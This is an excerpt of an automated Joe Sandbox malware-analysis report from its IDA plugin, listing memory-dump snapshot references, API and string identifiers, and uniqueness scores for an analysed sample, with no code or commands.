                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-605551621
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$@
                                                                            • API String ID: 0-1194432280
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0163CFBD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: CallFilterFunc@8
                                                                            • String ID: @$@4Cw@4Cw
                                                                            • API String ID: 4062629308-3101775584
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%